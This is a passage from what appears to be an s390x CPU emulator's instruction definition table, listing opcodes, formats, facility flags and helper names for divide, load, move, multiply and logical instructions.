14) /* CONVERT UTF-16 to UTF-8 */ D(0xb2a6, CU21, RRF_c, Z, 0, 0, 0, 0, cuXX, 0, 21) /* CONVERT UTF-16 to UTF-32 */ D(0xb9b1, CU24, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 24) /* CONVERT UTF-32 to UTF-8 */ D(0xb9b2, CU41, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 41) /* CONVERT UTF-32 to UTF-16 */ D(0xb9b3, CU42, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 42) /* DIVIDE */ C(0x1d00, DR, RR_a, Z, r1_D32, r2_32s, new_P, r1_P32, divs32, 0) C(0x5d00, D, RX_a, Z, r1_D32, m2_32s, new_P, r1_P32, divs32, 0) F(0xb30d, DEBR, RRE, Z, e1, e2, new, e1, deb, 0, IF_BFP) F(0xb31d, DDBR, RRE, Z, f1, f2, new, f1, ddb, 0, IF_BFP) F(0xb34d, DXBR, RRE, Z, x2h, x2l, x1, x1, dxb, 0, IF_BFP) F(0xed0d, DEB, RXE, Z, e1, m2_32u, new, e1, deb, 0, IF_BFP) F(0xed1d, DDB, RXE, Z, f1, m2_64, new, f1, ddb, 0, IF_BFP) /* DIVIDE LOGICAL */ C(0xb997, DLR, RRE, Z, r1_D32, r2_32u, new_P, r1_P32, divu32, 0) C(0xe397, DL, RXY_a, Z, r1_D32, m2_32u, new_P, r1_P32, divu32, 0) C(0xb987, DLGR, RRE, Z, 0, r2_o, r1_P, 0, divu64, 0) C(0xe387, DLG, RXY_a, Z, 0, m2_64, r1_P, 0, divu64, 0) /* DIVIDE SINGLE */ C(0xb90d, DSGR, RRE, Z, r1p1, r2, r1_P, 0, divs64, 0) C(0xb91d, DSGFR, RRE, Z, r1p1, r2_32s, r1_P, 0, divs64, 0) C(0xe30d, DSG, RXY_a, Z, r1p1, m2_64, r1_P, 0, divs64, 0) C(0xe31d, DSGF, RXY_a, Z, r1p1, m2_32s, r1_P, 0, divs64, 0) /* EXCLUSIVE OR */ C(0x1700, XR, RR_a, Z, r1, r2, new, r1_32, xor, nz32) C(0xb9f7, XRK, RRF_a, DO, r2, r3, new, r1_32, xor, nz32) C(0x5700, X, RX_a, Z, r1, m2_32s, new, r1_32, xor, nz32) C(0xe357, XY, RXY_a, LD, r1, m2_32s, new, r1_32, xor, nz32) C(0xb982, XGR, RRE, Z, r1, r2, r1, 0, 
xor, nz64) C(0xb9e7, XGRK, RRF_a, DO, r2, r3, r1, 0, xor, nz64) C(0xe382, XG, RXY_a, Z, r1, m2_64, r1, 0, xor, nz64) C(0xd700, XC, SS_a, Z, 0, 0, 0, 0, xc, 0) /* EXCLUSIVE OR IMMEDIATE */ D(0xc006, XIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, xori, 0, 0x2020) D(0xc007, XILF, RIL_a, EI, r1_o, i2_32u, r1, 0, xori, 0, 0x2000) D(0x9700, XI, SI, Z, la1, i2_8u, new, 0, xi, nz64, MO_UB) D(0xeb57, XIY, SIY, LD, la1, i2_8u, new, 0, xi, nz64, MO_UB) /* EXECUTE */ C(0x4400, EX, RX_a, Z, 0, a2, 0, 0, ex, 0) /* EXECUTE RELATIVE LONG */ C(0xc600, EXRL, RIL_b, EE, 0, ri2, 0, 0, ex, 0) /* EXTRACT ACCESS */ C(0xb24f, EAR, RRE, Z, 0, 0, new, r1_32, ear, 0) /* EXTRACT CPU ATTRIBUTE */ C(0xeb4c, ECAG, RSY_a, GIE, 0, a2, r1, 0, ecag, 0) /* EXTRACT CPU TIME */ C(0xc801, ECTG, SSF, ECT, 0, 0, 0, 0, ectg, 0) /* EXTRACT FPC */ F(0xb38c, EFPC, RRE, Z, 0, 0, new, r1_32, efpc, 0, IF_BFP) /* EXTRACT PSW */ C(0xb98d, EPSW, RRE, Z, 0, 0, 0, 0, epsw, 0) /* FIND LEFTMOST ONE */ C(0xb983, FLOGR, RRE, EI, 0, r2_o, r1_P, 0, flogr, 0) /* INSERT CHARACTER */ C(0x4300, IC, RX_a, Z, 0, m2_8u, 0, r1_8, mov2, 0) C(0xe373, ICY, RXY_a, LD, 0, m2_8u, 0, r1_8, mov2, 0) /* INSERT CHARACTERS UNDER MASK */ D(0xbf00, ICM, RS_b, Z, 0, a2, r1, 0, icm, 0, 0) D(0xeb81, ICMY, RSY_b, LD, 0, a2, r1, 0, icm, 0, 0) D(0xeb80, ICMH, RSY_b, Z, 0, a2, r1, 0, icm, 0, 32) /* INSERT IMMEDIATE */ D(0xc008, IIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, insi, 0, 0x2020) D(0xc009, IILF, RIL_a, EI, r1_o, i2_32u, r1, 0, insi, 0, 0x2000) D(0xa500, IIHH, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1030) D(0xa501, IIHL, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1020) D(0xa502, IILH, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1010) D(0xa503, IILL, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1000) /* INSERT PROGRAM MASK */ C(0xb222, IPM, RRE, Z, 0, 0, r1, 0, ipm, 0) /* LOAD */ C(0x1800, LR, RR_a, Z, 0, r2_o, 0, cond_r1r2_32, mov2, 0) C(0x5800, L, RX_a, Z, 0, a2, new, r1_32, ld32s, 0) C(0xe358, LY, RXY_a, LD, 0, a2, new, r1_32, ld32s, 0) C(0xb904, LGR, RRE, Z, 0, r2_o, 0, r1, mov2, 0) C(0xb914, LGFR, RRE, Z, 0, r2_32s, 0, r1, mov2, 0) C(0xe304, LG, RXY_a, Z, 0, a2, r1, 0, ld64, 0) C(0xe314, LGF, RXY_a, Z, 0, a2, r1, 0, ld32s, 0) F(0x2800, LDR, RR_a, Z, 0, f2, 0, f1, mov2, 0, IF_AFP1 | IF_AFP2) F(0x6800, LD, RX_a, Z, 0, m2_64, 0, f1, mov2, 0, IF_AFP1) F(0xed65, LDY, RXY_a, LD, 0, m2_64, 0, f1, mov2, 0, IF_AFP1) F(0x3800, LER, RR_a, Z, 0, e2, 0, cond_e1e2, mov2, 0, IF_AFP1 | IF_AFP2) F(0x7800, LE, RX_a, Z, 0, m2_32u, 0, e1, mov2, 0, IF_AFP1) F(0xed64, LEY, RXY_a, LD, 0, m2_32u, 0, e1, mov2, 0, IF_AFP1) F(0xb365, LXR, RRE, Z, x2h, x2l, 0, x1, movx, 0, IF_AFP1) /* LOAD IMMEDIATE */ C(0xc001, LGFI, RIL_a, EI, 0, i2, 0, r1, mov2, 0) /* LOAD RELATIVE LONG */ C(0xc40d, LRL, RIL_b, GIE, 0, ri2, new, r1_32, ld32s, 0) C(0xc408, LGRL, RIL_b, GIE, 0, ri2, r1, 0, ld64, 0) C(0xc40c, LGFRL, RIL_b, GIE, 0, ri2, r1, 0, ld32s, 0) /* LOAD ADDRESS */ C(0x4100, LA, RX_a, Z, 0, a2, 0, r1, mov2, 0) C(0xe371, LAY, RXY_a, LD, 0, a2, 0, r1, mov2, 0) /* LOAD ADDRESS EXTENDED */ C(0x5100, LAE, RX_a, Z, 0, a2, 0, r1, mov2e, 0) C(0xe375, LAEY, RXY_a, GIE, 0, a2, 0, r1, mov2e, 0) /* LOAD ADDRESS RELATIVE LONG */ C(0xc000, LARL, RIL_b, Z, 0, ri2, 0, r1, mov2, 0) /* LOAD AND ADD */ D(0xebf8, LAA, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, laa, adds32, MO_TESL) D(0xebe8, LAAG, RSY_a, ILA, r3, a2, new, in2_r1, laa, adds64, MO_TEQ) /* LOAD AND ADD LOGICAL */ D(0xebfa, LAAL, RSY_a, ILA, r3_32u, a2, new, in2_r1_32, laa, addu32, MO_TEUL) D(0xebea, LAALG, RSY_a, ILA, r3, a2, new, in2_r1, laa, addu64, MO_TEQ) /* LOAD AND AND */ 
D(0xebf4, LAN, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lan, nz32, MO_TESL) D(0xebe4, LANG, RSY_a, ILA, r3, a2, new, in2_r1, lan, nz64, MO_TEQ) /* LOAD AND EXCLUSIVE OR */ D(0xebf7, LAX, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lax, nz32, MO_TESL) D(0xebe7, LAXG, RSY_a, ILA, r3, a2, new, in2_r1, lax, nz64, MO_TEQ) /* LOAD AND OR */ D(0xebf6, LAO, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lao, nz32, MO_TESL) D(0xebe6, LAOG, RSY_a, ILA, r3, a2, new, in2_r1, lao, nz64, MO_TEQ) /* LOAD AND TEST */ C(0x1200, LTR, RR_a, Z, 0, r2_o, 0, cond_r1r2_32, mov2, s32) C(0xb902, LTGR, RRE, Z, 0, r2_o, 0, r1, mov2, s64) C(0xb912, LTGFR, RRE, Z, 0, r2_32s, 0, r1, mov2, s64) C(0xe312, LT, RXY_a, EI, 0, a2, new, r1_32, ld32s, s64) C(0xe302, LTG, RXY_a, EI, 0, a2, r1, 0, ld64, s64) C(0xe332, LTGF, RXY_a, GIE, 0, a2, r1, 0, ld32s, s64) F(0xb302, LTEBR, RRE, Z, 0, e2, 0, cond_e1e2, mov2, f32, IF_BFP) F(0xb312, LTDBR, RRE, Z, 0, f2, 0, f1, mov2, f64, IF_BFP) F(0xb342, LTXBR, RRE, Z, x2h, x2l, 0, x1, movx, f128, IF_BFP) /* LOAD AND TRAP */ C(0xe39f, LAT, RXY_a, LAT, 0, m2_32u, r1, 0, lat, 0) C(0xe385, LGAT, RXY_a, LAT, 0, a2, r1, 0, lgat, 0) /* LOAD AND ZERO RIGHTMOST BYTE */ C(0xe3eb, LZRF, RXY_a, LZRB, 0, m2_32u, new, r1_32, lzrb, 0) C(0xe32a, LZRG, RXY_a, LZRB, 0, m2_64, r1, 0, lzrb, 0) /* LOAD LOGICAL AND ZERO RIGHTMOST BYTE */ C(0xe33a, LLZRGF, RXY_a, LZRB, 0, m2_32u, r1, 0, lzrb, 0) /* LOAD BYTE */ C(0xb926, LBR, RRE, EI, 0, r2_8s, 0, r1_32, mov2, 0) C(0xb906, LGBR, RRE, EI, 0, r2_8s, 0, r1, mov2, 0) C(0xe376, LB, RXY_a, LD, 0, a2, new, r1_32, ld8s, 0) C(0xe377, LGB, RXY_a, LD, 0, a2, r1, 0, ld8s, 0) /* LOAD BYTE HIGH */ C(0xe3c0, LBH, RXY_a, HW, 0, a2, new, r1_32h, ld8s, 0) /* LOAD COMPLEMENT */ C(0x1300, LCR, RR_a, Z, 0, r2, new, r1_32, neg, neg32) C(0xb903, LCGR, RRE, Z, 0, r2, r1, 0, neg, neg64) C(0xb913, LCGFR, RRE, Z, 0, r2_32s, r1, 0, neg, neg64) F(0xb303, LCEBR, RRE, Z, 0, e2, new, e1, negf32, f32, IF_BFP) F(0xb313, LCDBR, RRE, Z, 0, f2, new, f1, negf64, f64, IF_BFP) F(0xb343, LCXBR, RRE, Z, x2h, x2l, new_P, x1, negf128, f128, IF_BFP) F(0xb373, LCDFR, RRE, FPSSH, 0, f2, new, f1, negf64, 0, IF_AFP1 | IF_AFP2) /* LOAD COUNT TO BLOCK BOUNDARY */ C(0xe727, LCBB, RXE, V, la2, 0, r1, 0, lcbb, 0) /* LOAD HALFWORD */ C(0xb927, LHR, RRE, EI, 0, r2_16s, 0, r1_32, mov2, 0) C(0xb907, LGHR, RRE, EI, 0, r2_16s, 0, r1, mov2, 0) C(0x4800, LH, RX_a, Z, 0, a2, new, r1_32, ld16s, 0) C(0xe378, LHY, RXY_a, LD, 0, a2, new, r1_32, ld16s, 0) C(0xe315, LGH, RXY_a, Z, 0, a2, r1, 0, ld16s, 0) /* LOAD HALFWORD HIGH */ C(0xe3c4, LHH, RXY_a, HW, 0, a2, new, r1_32h, ld16s, 0) /* LOAD HALFWORD IMMEDIATE */ C(0xa708, LHI, RI_a, Z, 0, i2, 0, r1_32, mov2, 0) C(0xa709, LGHI, RI_a, Z, 0, i2, 0, r1, mov2, 0) /* LOAD HALFWORD RELATIVE LONG */ C(0xc405, LHRL, RIL_b, GIE, 0, ri2, new, r1_32, ld16s, 0) C(0xc404, LGHRL, RIL_b, GIE, 0, ri2, r1, 0, ld16s, 0) /* LOAD HIGH */ C(0xe3ca, LFH, RXY_a, HW, 0, a2, new, r1_32h, ld32u, 0) /* LOAD HIGH AND TRAP */ C(0xe3c8, LFHAT, RXY_a, LAT, 0, m2_32u, r1, 0, lfhat, 0) /* LOAD LOGICAL */ C(0xb916, LLGFR, RRE, Z, 0, r2_32u, 0, r1, mov2, 0) C(0xe316, LLGF, RXY_a, Z, 0, a2, r1, 0, ld32u, 0) /* LOAD LOGICAL AND TRAP */ C(0xe39d, LLGFAT, RXY_a, LAT, 0, a2, r1, 0, llgfat, 0) /* LOAD LOGICAL RELATIVE LONG */ C(0xc40e, LLGFRL, RIL_b, GIE, 0, ri2, r1, 0, ld32u, 0) /* LOAD LOGICAL CHARACTER */ C(0xb994, LLCR, RRE, EI, 0, r2_8u, 0, r1_32, mov2, 0) C(0xb984, LLGCR, RRE, EI, 0, r2_8u, 0, r1, mov2, 0) C(0xe394, LLC, RXY_a, EI, 0, a2, new, r1_32, ld8u, 0) C(0xe390, LLGC, RXY_a, Z, 0, a2, r1, 0, ld8u, 0) /* LOAD LOGICAL
CHARACTER HIGH */ C(0xe3c2, LLCH, RXY_a, HW, 0, a2, new, r1_32h, ld8u, 0) /* LOAD LOGICAL HALFWORD */ C(0xb995, LLHR, RRE, EI, 0, r2_16u, 0, r1_32, mov2, 0) C(0xb985, LLGHR, RRE, EI, 0, r2_16u, 0, r1, mov2, 0) C(0xe395, LLH, RXY_a, EI, 0, a2, new, r1_32, ld16u, 0) C(0xe391, LLGH, RXY_a, Z, 0, a2, r1, 0, ld16u, 0) /* LOAD LOGICAL HALFWORD HIGH */ C(0xe3c6, LLHH, RXY_a, HW, 0, a2, new, r1_32h, ld16u, 0) /* LOAD LOGICAL HALFWORD RELATIVE LONG */ C(0xc402, LLHRL, RIL_b, GIE, 0, ri2, new, r1_32, ld16u, 0) C(0xc406, LLGHRL, RIL_b, GIE, 0, ri2, r1, 0, ld16u, 0) /* LOAD LOGICAL IMMEDIATE */ D(0xc00e, LLIHF, RIL_a, EI, 0, i2_32u_shl, 0, r1, mov2, 0, 32) D(0xc00f, LLILF, RIL_a, EI, 0, i2_32u_shl, 0, r1, mov2, 0, 0) D(0xa50c, LLIHH, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 48) D(0xa50d, LLIHL, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 32) D(0xa50e, LLILH, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 16) D(0xa50f, LLILL, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 0) /* LOAD LOGICAL THIRTY ONE BITS */ C(0xb917, LLGTR, RRE, Z, 0, r2_o, r1, 0, llgt, 0) C(0xe317, LLGT, RXY_a, Z, 0, m2_32u, r1, 0, llgt, 0) /* LOAD LOGICAL THIRTY ONE BITS AND TRAP */ C(0xe39c, LLGTAT, RXY_a, LAT, 0, m2_32u, r1, 0, llgtat, 0) /* LOAD FPR FROM GR */ F(0xb3c1, LDGR, RRE, FPRGR, 0, r2_o, 0, f1, mov2, 0, IF_AFP1) /* LOAD GR FROM FPR */ F(0xb3cd, LGDR, RRE, FPRGR, 0, f2, 0, r1, mov2, 0, IF_AFP2) /* LOAD NEGATIVE */ C(0x1100, LNR, RR_a, Z, 0, r2_32s, new, r1_32, nabs, nabs32) C(0xb901, LNGR, RRE, Z, 0, r2, r1, 0, nabs, nabs64) C(0xb911, LNGFR, RRE, Z, 0, r2_32s, r1, 0, nabs, nabs64) F(0xb301, LNEBR, RRE, Z, 0, e2, new, e1, nabsf32, f32, IF_BFP) F(0xb311, LNDBR, RRE, Z, 0, f2, new, f1, nabsf64, f64, IF_BFP) F(0xb341, LNXBR, RRE, Z, x2h, x2l, new_P, x1, nabsf128, f128, IF_BFP) F(0xb371, LNDFR, RRE, FPSSH, 0, f2, new, f1, nabsf64, 0, IF_AFP1 | IF_AFP2) /* LOAD ON CONDITION */ C(0xb9f2, LOCR, RRF_c, LOC, r1, r2, new, r1_32, loc, 0) C(0xb9e2, LOCGR, RRF_c, LOC, r1, r2, r1, 0, loc, 0) C(0xebf2, LOC, RSY_b, LOC, r1, m2_32u, new, r1_32, loc, 0) C(0xebe2, LOCG, RSY_b, LOC, r1, m2_64, r1, 0, loc, 0) /* LOAD HALFWORD IMMEDIATE ON CONDITION */ C(0xec42, LOCHI, RIE_g, LOC2, r1, i2, new, r1_32, loc, 0) C(0xec46, LOCGHI, RIE_g, LOC2, r1, i2, r1, 0, loc, 0) C(0xec4e, LOCHHI, RIE_g, LOC2, r1_sr32, i2, new, r1_32h, loc, 0) /* LOAD HIGH ON CONDITION */ C(0xb9e0, LOCFHR, RRF_c, LOC2, r1_sr32, r2, new, r1_32h, loc, 0) C(0xebe0, LOCFH, RSY_b, LOC2, r1_sr32, m2_32u, new, r1_32h, loc, 0) /* LOAD PAIR DISJOINT */ D(0xc804, LPD, SSF, ILA, 0, 0, new_P, r3_P32, lpd, 0, MO_TEUL) D(0xc805, LPDG, SSF, ILA, 0, 0, new_P, r3_P64, lpd, 0, MO_TEQ) /* LOAD PAIR FROM QUADWORD */ C(0xe38f, LPQ, RXY_a, Z, 0, a2, r1_P, 0, lpq, 0) /* LOAD POSITIVE */ C(0x1000, LPR, RR_a, Z, 0, r2_32s, new, r1_32, abs, abs32) C(0xb900, LPGR, RRE, Z, 0, r2, r1, 0, abs, abs64) C(0xb910, LPGFR, RRE, Z, 0, r2_32s, r1, 0, abs, abs64) F(0xb300, LPEBR, RRE, Z, 0, e2, new, e1, absf32, f32, IF_BFP) F(0xb310, LPDBR, RRE, Z, 0, f2, new, f1, absf64, f64, IF_BFP) F(0xb340, LPXBR, RRE, Z, x2h, x2l, new_P, x1, absf128, f128, IF_BFP) F(0xb370, LPDFR, RRE, FPSSH, 0, f2, new, f1, absf64, 0, IF_AFP1 | IF_AFP2) /* LOAD REVERSED */ C(0xb91f, LRVR, RRE, Z, 0, r2_32u, new, r1_32, rev32, 0) C(0xb90f, LRVGR, RRE, Z, 0, r2_o, r1, 0, rev64, 0) C(0xe31f, LRVH, RXY_a, Z, 0, m2_16u, new, r1_16, rev16, 0) C(0xe31e, LRV, RXY_a, Z, 0, m2_32u, new, r1_32, rev32, 0) C(0xe30f, LRVG, RXY_a, Z, 0, m2_64, r1, 0, rev64, 0) /* LOAD ZERO */ F(0xb374, LZER, RRE, Z, 0, 0, 0, e1, zero, 0, IF_AFP1) F(0xb375, LZDR, RRE, Z, 0, 0, 0, f1, zero, 0,
IF_AFP1) F(0xb376, LZXR, RRE, Z, 0, 0, 0, x1, zero2, 0, IF_AFP1) /* LOAD FPC */ F(0xb29d, LFPC, S, Z, 0, m2_32u, 0, 0, sfpc, 0, IF_BFP) /* LOAD FPC AND SIGNAL */ F(0xb2bd, LFAS, S, IEEEE_SIM, 0, m2_32u, 0, 0, sfas, 0, IF_DFP) /* LOAD FP INTEGER */ F(0xb357, FIEBR, RRF_e, Z, 0, e2, new, e1, fieb, 0, IF_BFP) F(0xb35f, FIDBR, RRF_e, Z, 0, f2, new, f1, fidb, 0, IF_BFP) F(0xb347, FIXBR, RRF_e, Z, x2h, x2l, new_P, x1, fixb, 0, IF_BFP) /* LOAD LENGTHENED */ F(0xb304, LDEBR, RRE, Z, 0, e2, new, f1, ldeb, 0, IF_BFP) F(0xb305, LXDBR, RRE, Z, 0, f2, new_P, x1, lxdb, 0, IF_BFP) F(0xb306, LXEBR, RRE, Z, 0, e2, new_P, x1, lxeb, 0, IF_BFP) F(0xed04, LDEB, RXE, Z, 0, m2_32u, new, f1, ldeb, 0, IF_BFP) F(0xed05, LXDB, RXE, Z, 0, m2_64, new_P, x1, lxdb, 0, IF_BFP) F(0xed06, LXEB, RXE, Z, 0, m2_32u, new_P, x1, lxeb, 0, IF_BFP) F(0xb324, LDER, RXE, Z, 0, e2, new, f1, lde, 0, IF_AFP1) F(0xed24, LDE, RXE, Z, 0, m2_32u, new, f1, lde, 0, IF_AFP1) /* LOAD ROUNDED */ F(0xb344, LEDBR, RRF_e, Z, 0, f2, new, e1, ledb, 0, IF_BFP) F(0xb345, LDXBR, RRF_e, Z, x2h, x2l, new, f1, ldxb, 0, IF_BFP) F(0xb346, LEXBR, RRF_e, Z, x2h, x2l, new, e1, lexb, 0, IF_BFP) /* LOAD MULTIPLE */ C(0x9800, LM, RS_a, Z, 0, a2, 0, 0, lm32, 0) C(0xeb98, LMY, RSY_a, LD, 0, a2, 0, 0, lm32, 0) C(0xeb04, LMG, RSY_a, Z, 0, a2, 0, 0, lm64, 0) /* LOAD MULTIPLE HIGH */ C(0xeb96, LMH, RSY_a, Z, 0, a2, 0, 0, lmh, 0) /* LOAD ACCESS MULTIPLE */ C(0x9a00, LAM, RS_a, Z, 0, a2, 0, 0, lam, 0) C(0xeb9a, LAMY, RSY_a, LD, 0, a2, 0, 0, lam, 0) /* MOVE */ C(0xd200, MVC, SS_a, Z, la1, a2, 0, 0, mvc, 0) C(0xe544, MVHHI, SIL, GIE, la1, i2, 0, m1_16, mov2, 0) C(0xe54c, MVHI, SIL, GIE, la1, i2, 0, m1_32, mov2, 0) C(0xe548, MVGHI, SIL, GIE, la1, i2, 0, m1_64, mov2, 0) C(0x9200, MVI, SI, Z, la1, i2, 0, m1_8, mov2, 0) C(0xeb52, MVIY, SIY, LD, la1, i2, 0, m1_8, mov2, 0) /* MOVE INVERSE */ C(0xe800, MVCIN, SS_a, Z, la1, a2, 0, 0, mvcin, 0) /* MOVE LONG */ C(0x0e00, MVCL, RR_a, Z, 0, 0, 0, 0, mvcl, 0) /* MOVE LONG EXTENDED */ C(0xa800, MVCLE, RS_a, Z, 0, a2, 0, 0, mvcle, 0) /* MOVE LONG UNICODE */ C(0xeb8e, MVCLU, RSY_a, E2, 0, a2, 0, 0, mvclu, 0) /* MOVE NUMERICS */ C(0xd100, MVN, SS_a, Z, la1, a2, 0, 0, mvn, 0) /* MOVE PAGE */ C(0xb254, MVPG, RRE, Z, r1_o, r2_o, 0, 0, mvpg, 0) /* MOVE STRING */ C(0xb255, MVST, RRE, Z, 0, 0, 0, 0, mvst, 0) /* MOVE WITH OPTIONAL SPECIFICATION */ C(0xc800, MVCOS, SSF, MVCOS, la1, a2, 0, 0, mvcos, 0) /* MOVE WITH OFFSET */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit field. 
*/ C(0xf100, MVO, SS_a, Z, la1, a2, 0, 0, mvo, 0) /* MOVE ZONES */ C(0xd300, MVZ, SS_a, Z, la1, a2, 0, 0, mvz, 0) /* MULTIPLY */ C(0x1c00, MR, RR_a, Z, r1p1_32s, r2_32s, new, r1_D32, mul, 0) C(0x5c00, M, RX_a, Z, r1p1_32s, m2_32s, new, r1_D32, mul, 0) C(0xe35c, MFY, RXY_a, GIE, r1p1_32s, m2_32s, new, r1_D32, mul, 0) F(0xb317, MEEBR, RRE, Z, e1, e2, new, e1, meeb, 0, IF_BFP) F(0xb31c, MDBR, RRE, Z, f1, f2, new, f1, mdb, 0, IF_BFP) F(0xb34c, MXBR, RRE, Z, x2h, x2l, x1, x1, mxb, 0, IF_BFP) F(0xb30c, MDEBR, RRE, Z, f1, e2, new, f1, mdeb, 0, IF_BFP) F(0xb307, MXDBR, RRE, Z, 0, f2, x1, x1, mxdb, 0, IF_BFP) F(0xed17, MEEB, RXE, Z, e1, m2_32u, new, e1, meeb, 0, IF_BFP) F(0xed1c, MDB, RXE, Z, f1, m2_64, new, f1, mdb, 0, IF_BFP) F(0xed0c, MDEB, RXE, Z, f1, m2_32u, new, f1, mdeb, 0, IF_BFP) F(0xed07, MXDB, RXE, Z, 0, m2_64, x1, x1, mxdb, 0, IF_BFP) /* MULTIPLY HALFWORD */ C(0x4c00, MH, RX_a, Z, r1_o, m2_16s, new, r1_32, mul, 0) C(0xe37c, MHY, RXY_a, GIE, r1_o, m2_16s, new, r1_32, mul, 0) /* MULTIPLY HALFWORD IMMEDIATE */ C(0xa70c, MHI, RI_a, Z, r1_o, i2, new, r1_32, mul, 0) C(0xa70d, MGHI, RI_a, Z, r1_o, i2, r1, 0, mul, 0) /* MULTIPLY LOGICAL */ C(0xb996, MLR, RRE, Z, r1p1_32u, r2_32u, new, r1_D32, mul, 0) C(0xe396, ML, RXY_a, Z, r1p1_32u, m2_32u, new, r1_D32, mul, 0) C(0xb986, MLGR, RRE, Z, r1p1, r2_o, r1_P, 0, mul128, 0) C(0xe386, MLG, RXY_a, Z, r1p1, m2_64, r1_P, 0, mul128, 0) /* MULTIPLY SINGLE */ C(0xb252, MSR, RRE, Z, r1_o, r2_o, new, r1_32, mul, 0) C(0x7100, MS, RX_a, Z, r1_o, m2_32s, new, r1_32, mul, 0) C(0xe351, MSY, RXY_a, LD, r1_o, m2_32s, new, r1_32, mul, 0) C(0xb90c, MSGR, RRE, Z, r1_o, r2_o, r1, 0, mul, 0) C(0xb91c, MSGFR, RRE, Z, r1_o, r2_32s, r1, 0, mul, 0) C(0xe30c, MSG, RXY_a, Z, r1_o, m2_64, r1, 0, mul, 0) C(0xe31c, MSGF, RXY_a, Z, r1_o, m2_32s, r1, 0, mul, 0) /* MULTIPLY SINGLE IMMEDIATE */ C(0xc201, MSFI, RIL_a, GIE, r1_o, i2, new, r1_32, mul, 0) C(0xc200, MSGFI, RIL_a, GIE, r1_o, i2, r1, 0, mul, 0) /* MULTIPLY AND ADD */ F(0xb30e, MAEBR, RRD, Z, e1, e2, new, e1, maeb, 0, IF_BFP) F(0xb31e, MADBR, RRD, Z, f1, f2, new, f1, madb, 0, IF_BFP) F(0xed0e, MAEB, RXF, Z, e1, m2_32u, new, e1, maeb, 0, IF_BFP) F(0xed1e, MADB, RXF, Z, f1, m2_64, new, f1, madb, 0, IF_BFP) /* MULTIPLY AND SUBTRACT */ F(0xb30f, MSEBR, RRD, Z, e1, e2, new, e1, mseb, 0, IF_BFP) F(0xb31f, MSDBR, RRD, Z, f1, f2, new, f1, msdb, 0, IF_BFP) F(0xed0f, MSEB, RXF, Z, e1, m2_32u, new, e1, mseb, 0, IF_BFP) F(0xed1f, MSDB, RXF, Z, f1, m2_64, new, f1, msdb, 0, IF_BFP) /* OR */ C(0x1600, OR, RR_a, Z, r1, r2, new, r1_32, or, nz32) C(0xb9f6, ORK, RRF_a, DO, r2, r3, new, r1_32, or, nz32) C(0x5600, O, RX_a, Z, r1, m2_32s, new, r1_32, or, nz32) C(0xe356, OY, RXY_a, LD, r1, m2_32s, new, r1_32, or, nz32) C(0xb981, OGR, RRE, Z, r1, r2, r1, 0, or, nz64) C(0xb9e6, OGRK, RRF_a, DO, r2, r3, r1, 0, or, nz64) C(0xe381, OG, RXY_a, Z, r1, m2_64, r1, 0, or, nz64) C(0xd600, OC, SS_a, Z, la1, a2, 0, 0, oc, 0) /* OR IMMEDIATE */ D(0xc00c, OIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, ori, 0, 0x2020) D(0xc00d, OILF, RIL_a, EI, r1_o, i2_32u, r1, 0, ori, 0, 0x2000) D(0xa508, OIHH, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1030) D(0xa509, OIHL, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1020) D(0xa50a, OILH, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1010) D(0xa50b, OILL, RI_a, Z, r1_o, i2_16u, r1, 0, ori, 0, 0x1000) D(0x9600, OI, SI, Z, la1, i2_8u, new, 0, oi, nz64, MO_UB) D(0xeb56, OIY, SIY, LD, la1, i2_8u, new, 0, oi, nz64, MO_UB) /* PACK */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit 
field. */ C(0xf200, PACK, SS_a, Z, la1, a2, 0, 0, pack, 0) /* PACK ASCII */ C(0xe900, PKA, SS_f, E2, la1, a2, 0, 0, pka, 0) /* PACK UNICODE */ C(0xe100, PKU, SS_f, E2, la1, a2, 0, 0, pku, 0) /* PREFETCH */ /* Implemented as nops of course. */ C(0xe336, PFD, RXY_b, GIE, 0, 0, 0, 0, 0, 0) C(0xc602, PFDRL, RIL_c, GIE, 0, 0, 0, 0, 0, 0) /* PERFORM PROCESSOR ASSIST */ /* Implemented as nop of course. */ C(0xb2e8, PPA, RRF_c, PPA, 0, 0, 0, 0, 0, 0) /* POPULATION COUNT */ C(0xb9e1, POPCNT, RRE, PC, 0, r2_o, r1, 0, popcnt, nz64) /* ROTATE LEFT SINGLE LOGICAL */ C(0xeb1d, RLL, RSY_a, Z, r3_o, sh, new, r1_32, rll32, 0) C(0xeb1c, RLLG, RSY_a, Z, r3_o, sh, r1, 0, rll64, 0) /* ROTATE THEN INSERT SELECTED BITS */ C(0xec55, RISBG, RIE_f, GIE, 0, r2, r1, 0, risbg, s64) C(0xec59, RISBGN, RIE_f, MIE, 0, r2, r1, 0, risbg, 0) C(0xec5d, RISBHG, RIE_f, HW, 0, r2, r1, 0, risbg, 0) C(0xec51, RISBLG, RIE_f, HW, 0, r2, r1, 0, risbg, 0) /* ROTATE THEN <OP> SELECTED BITS */ C(0xec54, RNSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) C(0xec56, ROSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) C(0xec57, RXSBG, RIE_f, GIE, 0, r2, r1, 0, rosbg, 0) /* SEARCH STRING */ C(0xb25e, SRST, RRE, Z, 0, 0, 0, 0, srst, 0) /* SEARCH STRING UNICODE */ C(0xb9be, SRSTU, RRE, 